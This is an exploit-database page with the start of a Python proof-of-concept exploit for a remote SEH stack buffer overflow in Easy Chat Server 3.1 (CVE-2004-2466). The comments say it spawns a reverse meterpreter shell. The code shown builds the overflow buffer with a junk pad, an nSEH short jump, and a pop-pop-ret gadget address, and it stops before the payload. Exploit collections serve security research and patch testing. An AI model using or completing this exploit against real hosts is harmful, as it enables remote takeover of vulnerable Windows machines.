Exploit / Vulnerability Discovered: 2022-08-01
Type: remote
Platform: windows
This exploit / vulnerability, Easy Chat Server 3.1 Remote Stack Buffer Overflow (SEH), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)
#!/usr/bin/python3
import sys
import socket
from struct import pack
host = sys.argv[1] # Receive IP from user
port = int(sys.argv[2]) # Receive port from user
junk = b"A" * 217
nseh = pack("<L", 0x06eb9090) # short jump 6 bytes
seh = pack("<L", 0x1001ae86) # pop pop ret 1001AE86 SSLEAY32.DLL